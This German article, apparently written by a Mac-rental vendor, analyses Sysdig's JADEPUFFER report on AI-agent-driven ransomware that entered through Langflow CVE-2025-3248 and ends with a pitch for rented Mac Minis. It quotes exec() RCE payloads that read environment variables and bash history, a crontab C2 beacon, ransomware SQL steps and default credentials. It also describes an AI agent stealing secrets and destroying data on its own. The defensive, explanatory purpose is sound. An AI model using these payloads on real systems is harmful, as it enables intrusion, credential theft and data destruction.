Sysdig-Forensik · CVE-2025-3248 · 600+ Payloads · ATA-Beweise · Mac-Mini-M4-Isolations-Checkliste
Kurzfassung: Am 1. Juli 2026 veröffentlichte Sysdig Threat Research (Michael Clark) den ersten dokumentierten Fall von End-to-End-LLM-gesteuerter Ransomware, Codename JADEPUFFER – ein Agentic Threat Actor (ATA), dessen Fähigkeiten von einem KI-Agenten und nicht von einem menschlichen Toolkit geliefert werden. Einstieg: ein internetexponiertes Langflow über CVE-2025-3248. Eigentliches Ziel: ein separater, öffentlich erreichbarer MySQL- + Alibaba-Nacos-Server. Über 600 gezielte Payloads wurden erfasst. Dieser Artikel behandelt die vollständige Timeline, Schwachstellenanalyse, die Zwei-Phasen-Angriffskette, vier Autonomie-Beweislinien, das Bitcoin-Adress-Rätsel, IOCs, Sysdig-Abwehrmaßnahmen, Branchenreaktionen, vier Schlussfolgerungen – und warum die Bereitstellung von OpenClaw/Langflow auf einem isolierten gemieteten Mac Mini M4 besser ist, als den eigenen Orchestrierungsserver dem Internet auszusetzen.
| Feld | Detail |
|---|---|
| Entdecker | Sysdig TRT; Bericht von Michael Clark |
| Veröffentlicht | 1. Juli 2026 (Medien-Follow-up 2.–6. Juli) |
| Codename | JADEPUFFER |
| Klassifizierung | ATA – Angriff durch KI-Agenten ausgeliefert |
| Einstieg | Öffentliches Langflow (CVE-2025-3248) |
| Ziel | Öffentlicher MySQL- + Nacos-Produktionsserver |
| Umfang | 600+ unterschiedliche Payloads |
KI-Orchestrierungshosts speichern oft LLM-API-Keys in Umgebungsvariablen – das erste Scan-Ziel von JADEPUFFER.
Teams stellen Prototypen eilig online, mit Langflow/OpenClaw Gateway ohne Zugriffskontrollen exponiert.
CVE-2025-3248 steht seit Mai 2025 im CISA-KEV-Katalog; Agenten machen die Ausnutzung alter Bugs nahezu kostenlos.
LLMjacking: gestohlene Cloud-/Modell-Credentials treiben Agenten mit nahezu null Grenzkosten.
| Zeitpunkt | Ereignis |
|---|---|
| Apr. 2025 | CVE-2025-3248 veröffentlicht (Langflow unauthentifizierter RCE) |
| 5. Mai 2025 | Eintrag im CISA-KEV-Katalog |
| 2025 | Gleiche Schwachstelle für Flodrix-Botnet (separate Kampagne, Trend Micro) |
| Jun. 2026 | JADEPUFFER-Angriff über mehrere Sitzungen in Wochen |
| 1. Juli 2026 | Sysdig-Technikbericht |
| 2.–6. Juli 2026 | Dark Reading, BleepingComputer, CyberScoop, CSO Online, Security Affairs |
| Punkt | Detail |
|---|---|
| Komponente | Langflow – Open-Source-Framework für visuelle KI-Agenten-Workflows, 70k+ GitHub-Stars |
| Schwachstellentypen | CWE-94 (Code-Injection) + CWE-306 (fehlende Authentifizierung bei kritischer Funktion) |
| CVSS | 9,8 Kritisch, Vektor CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| Betroffen | Alle Langflow-Versionen vor 1.3.0 |
| Ort | Endpoint /api/v1/validate/code |
| Behoben in | 1.3.0 (Authentifizierung hinzugefügt) |
| EPSS | 91,42 % Ausnutzungswahrscheinlichkeit (SentinelOne) |
Ursache in fünf Schritten:
Langflow stellt eine „Code-Validierungs“-API bereit, damit Nutzer benutzerdefinierte Funktionsknoten im visuellen Editor syntaktisch prüfen können.
Implementierungspfad: Nutzercode → ast.parse() → compile() → exec().
Kritischer Fehler: keine Authentifizierung und keine Sandbox-Isolation.
Exploit-Trick: Python-Decoratoren und Default-Argumente werden bei der Funktionsdefinition ausgewertet; Angreifer betten Schadcode in Defaults oder Decoratoren ein – sobald Langflow „validiert“, ist der Code bereits gelaufen.
Angreifer brauchen kein Login und keine Privilegien – nur einen gefälschten HTTP-POST für RCE.
exec('raise Exception(__import__("subprocess").check_output("whoami", shell=True))')
exec('raise Exception(__import__("subprocess").check_output("printenv", shell=True))')
exec('raise Exception(__import__("subprocess").check_output("cat /root/.bash_history", shell=True))')Wichtige Unterscheidung: Flodrix-Botnet-Auslieferung und JADEPUFFER sind zwei unabhängige Kampagnen, die dieselbe Einstiegs-CVE teilen. Flodrix ist traditionelle skriptgesteuerte Auslieferung; JADEPUFFER ist Sysdigs Fall von „KI-Agenten-gesteuerter“ Ransomware.
Patch (1.3.0): post_validate_code erhält _current_user: CurrentActiveUser Dependency Injection; FastAPI prüft zuerst JWT Bearer Token oder x-api-key – bei Fehlschlag 401/403, die Anfrage erreicht die verwundbare Logik nie.
Sysdig weist darauf hin, dass Langflow ein attraktiver Einstieg ist, weil Umgebungsvariablen oft LLM-API-Keys und Cloud-Credentials enthalten; viele Teams stellen Prototypen ohne Netzwerk-Zugriffskontrollen online.
Alle Payloads kamen als Base64-kodiertes Python über den Langflow-RCE-Endpoint.
Ausführung von id, uname -a, hostname, danach parallel Scan nach OpenAI- / Anthropic- / DeepSeek- / Gemini-API-Keys; ALIBABA_, ALIYUN_, TENCENT_, HUAWEI_ sowie AWS/GCP/Azure-Credentials; Krypto-Wallets und Seed-Phrasen; Datenbank-Credentials und Konfigurationsdateien.
Export von Langflows eigenem PostgreSQL-Backend, Diebstahl gespeicherter Credentials, API-Keys und Nutzerdatensätze, lokales Staging zur Prüfung, anschließend Löschung der Staging-Dateien.
Scan des internen Adressraums und benannter Dienste, Sondierung von Datenbanken, Object Storage, Secret Stores und Service-Discovery-Endpoints mit Default-Credentials.
Sondierung von minio.internal:9000 und 127.0.0.1:9000 mit Default minioadmin:minioadmin, Auflistung von Buckets inkl. terraform-state, danach gezieltes credentials.json. Adaptive Details: erste Anfrage mit ?format=json, Antwort war XML – der nächste Payload wechselte sofort auf einen XML-Parser. Klassische Probe-Fehler-Anpassungs-Schleife.
*/30 * * * * python3 -c "import urllib.request;urllib.request.urlopen('hxxp://45.131.66[.]106:4444/beacon',timeout=5)"Das eigentliche Ziel war ein weiterer ebenfalls internetexponierter Server mit MySQL und Alibaba Nacos. Nacos hat eine Auth-Bypass-Vergangenheit (CVE-2021-29441 und Varianten), und das Standard-JWT-Signing-Secret ist seit 2020 öffentlich dokumentiert – viele Deployments haben es nie rotiert.
Der Agent verband sich über den exponierten MySQL-Port mit Root-Credentials – Quelle unklar; Sysdig beobachtete keinen Diebstahl aus der Opferumgebung, was auf einen der wenigen möglicherweise menschlich vorbereiteten Schritte hindeutet.
| Zeit (UTC) | Aktion |
|---|---|
| 19:34:24 | Bcrypt-Hash erzeugt, xadmin mit Admin-Rolle eingefügt |
| 19:34:36 | Login-Versuch xadmin:Xploit@2026# — fehlgeschlagen |
| 19:34:48 | 12 Sekunden später: paralleler Test von nacos:nacos-Defaults und neu generiertem einfacheren Passwort-Hash |
| 19:35:07 | subprocess.run verworfen, import bcrypt genutzt, defekte Datensätze gelöscht und neu aufgebaut |
| 19:35:18 | Login erfolgreich — insgesamt 31 Sekunden |
MySQL INTO OUTFILE / LOAD_FILE zum Testen von Schreib-/Leserechten, /var/run/docker.sock, /proc/1/cgroup, /etc/hostname und UDF-Eskalationspfade. Vor der Ransomware wurde ein „Completion Marker“ geschrieben – Sysdig sieht darin ein Signal des Agenten über Phasenabschluss, kein festes Skriptverhalten.
Verschlüsselung aller 1.342 Nacos-Service-Konfigurationseinträge mit MySQL AES_ENCRYPT(), Löschung der Originaltabellen config_info und his_config_info, Erstellung der Lösegeldtabelle README_RANSOM.
KEY = base64.b64encode(uuid.uuid4().bytes + uuid.uuid4().bytes).decode()
print("Encryption key:", KEY) # einmal ausgegeben, nie gespeichert oder exfiltriert
# CREATE config_info_enc → DROP config_info → CREATE README_RANSOM
# Bitcoin: 3J98t1WpEZ73CNmQviecrnyiWrnqRhWNLy
# Kontakt: e78393397[@]proton[.]meSchlüsseldetail: Die Lösegeldnachricht behauptet AES-256, aber MySQL AES_ENCRYPT() nutzt standardmäßig AES-128-ECB; der Schlüssel war zufällig, nur auf stdout ausgegeben, nie gespeichert oder übertragen – auch bei Lösegeldzahlung nicht wiederherstellbar. Zwei Minuten später verfeinerte ein weiterer Payload die Zählung auf „alle 1.342 Einträge verschlüsselt“.
Eskalation zu DROP DATABASE mit Code-Kommentaren, die „High-ROI-Datenbanken, Backup auf 64.20.53[.]230“ behaupten – Sysdig fand keine unabhängigen Exfiltrationsnachweise. Ein DROP DATABASE scheiterte still an Foreign-Key-Constraints; der nächste Payload ergänzte SET GLOBAL FOREIGN_KEY_CHECKS=0 – die Korrektur erfordert Verständnis warum es scheiterte, nicht blinde Wiederholungen.
Selbsterzählender Code: Payloads voller natürlichsprachlicher Kommentare, die warum jeder Schritt erfolgt – inkl. ROI-Reihenfolge und „welche Datenbank am größten ist“. Diese Kommentare existieren nativ im Angreifercode, nicht nachträglich von Forschern erschlossen.
Maschinelle Fehlerdiagnose: die 31-Sekunden-Nacos-Backdoor-Reparatur ist das klarste Beispiel; MinIO-XML/JSON-Anpassung und Aufgeben blockierter JWT-Pfade wiederholen das Muster.
Natürlichsprachliches Kontextverständnis: Freitext in der Zielumgebung wurde geparst und Aktionen ausgeführt, die nur bei echtem Verständnis Sinn ergeben – über Wochen getrennte Sitzungen hinweg wiederholt.
Bitcoin-Adress-Rätsel (nächster Abschnitt) – zwei Interpretationen bleiben ununterscheidbar und illustrieren neue Attribution-Unsicherheit bei agentengesteuerten Angriffen.
Zusammen mit 600+ kohärenten Payloads in einem komprimierten Zeitfenster bewertet Sysdig die Beweislage als Hinweis auf einen autonom operierenden Agenten, nicht auf einen menschlichen Operator oder ein festes Toolkit.
Die Lösegeld-Bitcoin-Adresse 3J98t1WpEZ73CNmQviecrnyiWrnqRhWNLy ist das Standard-P2SH-Formatbeispiel, das in Bitcoin-Entwicklerdokumentation und im Bitcoin-Core-Repository wiederholt wird – auch reichlich in LLM-Trainingskorpora vorhanden.
On-Chain-Daten: 737 bestätigte Transaktionen, historisch ~46 BTC eingegangen, aktueller Saldo null (jede Einzahlung sofort woanders hin verschoben).
Sysdigs zwei ununterscheidbare Lesarten: (a) das LLM „halluzinierte“ die Adresse aus Trainingsdaten und die Wallet gehört einem Dritten, der irrtümliche Einzahlungen abräumt; (b) der Angreifer konfigurierte eine echte Wallet, die zufällig dem Doku-Beispiel entspricht. Ohne JADEPUFFERs System-Prompt bleiben beide möglich.
| Typ | Indikator |
|---|---|
| C2 / Beacon | 45.131.66[.]106; Crontab-Beacon hxxp://45.131.66[.]106:4444/beacon |
| Staging / Exfil (unverifiziert) | 64.20.53[.]230 (InterServer, AS19318) |
| Einstiegs-CVE | CVE-2025-3248 |
| Lösegeld-Bitcoin | 3J98t1WpEZ73CNmQviecrnyiWrnqRhWNLy |
| Lösegeld-E-Mail | e78393397[@]proton[.]me (keine Threat-Intel-Treffer; Format untypisch für bekannte MySQL-Ransomware-Gangs) |
| Lösegeldtabelle | README_RANSOM (kein Match zu WARNING, RECOVER_YOUR_DATA usw.) |
| Persistenz | Crontab-Beacon zu C2-Port 4444 alle 30 Minuten |
Sysdig vermerkt: Lösegeld-E-Mail und Tabellenname wirken wie konventionelle menschliche Ransomware, haben aber keine bekannte Vorläuferkampagne – weiteres Indiz für eine neuartige, agentengesteuerte Operation.
Langflow über CVE-2025-3248 hinaus patchen; Code-Ausführungs-/Validierungs-Endpoints niemals dem öffentlichen Internet aussetzen.
Runtime-Threat-Detection einsetzen, um bösartiges Verhalten in Datenbankprozessen zu erkennen.
LLM-API-Keys oder Cloud-Credentials nicht in Umgebungsvariablen des KI-Orchestrierungshosts speichern – dediziertes Secret Management, isoliert von internetexponierten Prozessen.
Nacos härten: Standard-token.secret.key rotieren, auf Versionen mit Pflicht für eigene Secrets upgraden; Nacos niemals öffentlich exponieren; Backend-DB nicht als Root anbinden.
Datenbank-Admin-Konten niemals öffentlich exponieren; starke eindeutige Credentials und Quell-IP-Beschränkungen auf Admin-Ports erzwingen.
Egress-Kontrolle anwenden, damit kompromittierte Hosts nicht frei beaconen oder externe Staging-Server erreichen.
Die obigen IOCs überwachen; Crontab-Jobs mit externen URLs und anomale geklammerte User-Agent-Strings beobachten.
BleepingComputer, Dark Reading, CyberScoop, Security Affairs und andere folgten schnell und bezeichneten den Vorfall weithin als „ersten vollständig KI-gesteuerten Ransomware-Angriff“ und markierten das Eintreten der ATA-Ära.
„Ich würde das als Evolution in der Ausführung einordnen, nicht als brandneue Ransomware-Technik. Der Unterschied: Ein KI-Agent kann Aufklärung, Credential-Diebstahl und Deployment verketten, ohne auf einen menschlichen Operator zu warten.“ — unabhängiger Forscher Vibhum Dubey (CSO Online)
Dubey ergänzt: Die eigentliche Sorge ist nicht die finale Verschlüsselungsphase, sondern die ruhige Zeit davor – der Agent kartiert Identitätssysteme, Berechtigungen und Vertrauensketten unter dem Radar; blockierte Pfade lösen schnelle Taktikwechsel aus, sodass jeder Eindringversuch leicht anders aussehen kann.
Mehrere Medien verknüpften den Fall mit LLMjacking: durch gestohlene Credentials angetriebene Agenten machen komplexe Mehrphasen-Angriffe nahezu kostenlos.
Ransomware ist nicht mehr „Handwerk erfahrener Operatoren“: Ein LLM-Agent kann Aufklärung, Diebstahl, laterale Bewegung, Persistenz und Zerstörung ohne tiefes Operator-Know-how verketten.
Alte Bugs werden automatisiert: Downstream-Ziele trafen Nacos-Probleme von 2021 und nie rotierte Standard-Secrets; Agenten machen das Ausnutzen historischer CVEs nahezu kostenlos.
Absicht wurde lesbar – eine Chance für Verteidiger: LLMs erzählen Ziele in Payloads mit, was einen neuen Erkennungs- und Analysehebel bietet.
„Gesichert“ war Agenten-Selbstgespräch: Verschlüsselungsschlüssel waren ephemer und nicht wiederherstellbar – Zahlung kann Konfigurationen nicht zurückbringen.
Der Bericht schließt: Keine einzelne Technik ist neu; entscheidend ist, dass ein KI-Modell sie zu einer vollständigen Lösegeldoperation gegen vernachlässigte öffentliche Infrastruktur verknüpft. Die Skill-Schwelle liegt jetzt bei „den Preis für den Betrieb eines Agenten“.
JADEPUFFER-Opfer passen zu einem klaren Profil: Langflow öffentlich exponiert, API-Keys in Umgebungsvariablen, Produktions-MySQL/Nacos ebenfalls exponiert. Für Entwickler mit OpenClaw, Langflow oder Hermes Agent auf macOS muss „Mac mini kaufen und an öffentliche IP hängen“ vs. „isolierten Remote-Mac mieten“ neu bewertet werden – besonders nach Apples Preiserhöhung im Juni 2026 (siehe unseren Mac-Mini-M4-Miete-vs-Kauf-Leitfaden).
| Dimension | Eigener Mac mit öffentlicher IP | VNCMac isolierter Mac Mini M4 |
|---|---|---|
| Anschaffungskosten | 799 $+ nach Erhöhung + AppleCare/Strom/öffentliche IP | ~8–15 $/Tag oder ~85–125 $/Monat, jederzeit kündbar |
| Angriffsfläche | Gateway/Validate-Endpoints leicht falsch exponiert | SSH/VNC-Zugang; nicht für nackte öffentliche Agent-Konsolen gedacht |
| API-Key-Handling | Oft in .env / Env-Vars (JADEPUFFER-Phase-1-Scan-Ziel) | SecretRef / Vault; Knotenwechsel nach Projektende |
| GUI-Verifikation | Nur lokal | VNC für OpenClaw-Freigabedialoge, Gateway-Konsole, macOS-Datenschutz (siehe OpenClaw grafische Authentifizierung) |
| Egress-Kontrolle | Eigene Policy nötig | SSH-Tunnel-Optionen; weniger blinde öffentliche Beacons |
| Incident Response | Hauptrechner kontaminiert, großer Secret-Blast-Radius | Miete stoppen / Knoten tauschen; isoliert vom Windows-Daily-Driver |
Isolierten Knoten bereitstellen: Mac-Mini-M4-Plan wählen; OpenClaw Gateway (18789) oder Langflow-Validate-Endpoints nicht direkt ins öffentliche Internet mappen – bei externem Zugang Nginx/Caddy Reverse Proxy + HTTPS nutzen.
Patchen: Langflow ≥ 1.3.0; Nacos-JWT rotieren; keine Root-DB aus dem Internet erreichbar.
Keys aus Env-Vars: LLM-API-Keys in Secret Managern oder OpenClaw SecretRef, isoliert von RCE-fähigen Prozessen.
VNC-Grafikverifikation: Gateway-Konsole, Plugin-Freigaben (/approve), macOS Bildschirmaufnahme/Bedienungshilfen prüfen – Schritte, die SSH nicht erledigen kann, erfordern VNC.
Egress- und IOC-Monitoring: ausgehende Beacons begrenzen; Crontab-Externaufrufe und README_RANSOM-IOCs beobachten; Backup exportieren und Miete beenden, wenn fertig.
Nein. Beide nutzen CVE-2025-3248, aber Flodrix ist traditionelle skriptgesteuerte Botnet-Auslieferung; JADEPUFFER ist Sysdigs KI-Agenten-gesteuerter Ransomware-Fall.
Nein. Schlüssel waren uuid4()-zufällig, einmal auf stdout ausgegeben, nie gespeichert – der Angreifer kann vermutlich ebenfalls nicht entschlüsseln. Daten sind dauerhaft verloren.
Gleiche Risikologik: öffentliche Exposition + Secrets in Env-Vars + ungehärtete Abhängigkeiten. Patchen, Egress begrenzen, auf isoliertem Remote-Mac mit VNC-Verifikation deployen – Gateway nicht nackt ins Internet stellen.
Sysdig und mehrere Medien erwarten steigendes Volumen und Umfang mit reifender Agenten-Tooling; öffentliche App-Server, ungehärtete Config-Center und öffentliche DB-Admin-Konten sind erste Ziele.
OpenClaw / Claude Code brauchen macOS-Grafikberechtigungen und QR-Pairing, die headless Linux nicht bietet; ein physischer Mac + VNC führt den vollen Workflow isoliert aus, ohne Hardware nach der Preiserhöhung zu kaufen.
Sysdig „JADEPUFFER: Agentic ransomware for automated database extortion“; BleepingComputer; Dark Reading; CyberScoop; CSO Online (Vibhum Dubey); Security Affairs; Trend Micro (CVE-2025-3248 / Flodrix); NVD / SentinelOne / Zscaler; CISA-KEV-Katalog.
JADEPUFFER ist ein Weckruf: KI-Agenten senkten die Schwelle von „erfahrenem menschlichem Operator“ auf „Kosten für den Betrieb eines Modells“, und Opfer sind oft bereits vernachlässigte öffentliche Infrastruktur. Für OpenClaw-, Langflow- oder lokale Agenten-Arbeit auf macOS multipliziert Self-Hosting auf einer heimischen öffentlichen IP Key-Leak-, Patch-Lag- und Egress-Risiken in der ATA-Ära.
Einen isolierten VNCMac Mac Mini M4 mieten, Gateway und Systemberechtigungen per VNC prüfen, Keys aus Umgebungsvariablen halten und die Miete nach Projektende beenden – das schlägt einen Orchestrierungsserver auf einer privaten öffentlichen IP. Siehe Mac-Mini-M4-Tarife und SSH-VNC-Hilfe zum Einstieg.